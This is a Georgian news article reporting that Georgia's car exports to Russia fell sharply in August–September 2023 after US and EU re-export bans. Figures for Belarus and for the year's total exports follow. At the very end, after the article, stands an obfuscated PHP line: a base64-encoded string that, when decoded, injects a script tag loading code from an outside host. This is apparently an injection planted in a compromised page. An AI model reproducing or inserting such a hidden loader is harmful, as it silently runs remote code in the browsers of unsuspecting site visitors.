celsiusi
ავერსი საქკაბელი

2023 წლის აგვისტო-სექტემბერში, წინა წლის ანალოგიურ პერიოდთან შედარებით, საქართველოდან რუსეთში ავტომობილების ექსპორტი 23.5 მლნ აშშ დოლარიდან, 1.08 მლნ აშშ დოლარამდე შემცირდა. მიზეზი მიმდინარე წლის აგვისტო-სექტემბრიდან, სანქციების ფარგლებში, საქართველოდან რუსეთში ამერიკული და ევროპული ავტომობილების რეექსპორტი/ექსპორტის აკრძალვაა.

უფრო კონკრეტულად, 2023 წლის სექტემბერში რუსეთში 304.8 ათასი დოლარის ღირებულების მხოლოდ 26 მანქანა გაიყიდა, აგვისტოში - 781.8 ათასი დოლარის 85 ერთეული. 2022 წლის სექტემბერში რუსეთში რეექსპორტზე გავიდა 11.473 მლნ დოლარის ღირებულების 660 მსუბუქი ავტომობილი, იმავე წლის აგვისტოში კი 12.030 მლნ დოლარის ღირებულების 739 ერთეული.

ცნობისთვის, ევროკავშირის მე-11 პაკეტის ფარგლებში 26 სექტემბრიდან საქართველოდან რუსეთსა და ბელარუსში ევროპული ავტომობილების რეექსპორტი/ექსპორტიც აიკრძალა. უფრო ადრე, ამავე წლის 1-ლი აგვისტოდან კი ამ ქვეყნებში ამერიკული მანქანების გაყვანა აიკრძალა.

რაც შეეხება ბელარუსს, ის საქართველოსთვის ავტომობილების მთავარი საექსპორტო ბაზარი არც აქამდე ყოფილა, თუმცა სანქციების შედეგად რაოდენობა კიდევ მეტად შემცირდა. კერძოდ, 2022 წლის აგვისტო-სექტემბერში საქართველომ ბელარუსში 2.9 მლნ აშშ დოლარის 70 ავტომობილი გაყიდა, 2023 წლის აგვისტოსა და სექტემბერში კი, 933.8 ათასი დოლარის 30 მანქანა.

რაც შეეხება ზოგად მაჩვენებლებს, 2023 წლის იანვარ-სექტემბერში საქართველოდან 1.5 მლრდ აშშ დოლარის ავტომობილების ექსპორტი განხორციელდა, გასული წლის ანალოგიურ პერიოდში კი, 592.2 მლნ აშშ დოლარის ღირებულების.

347
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");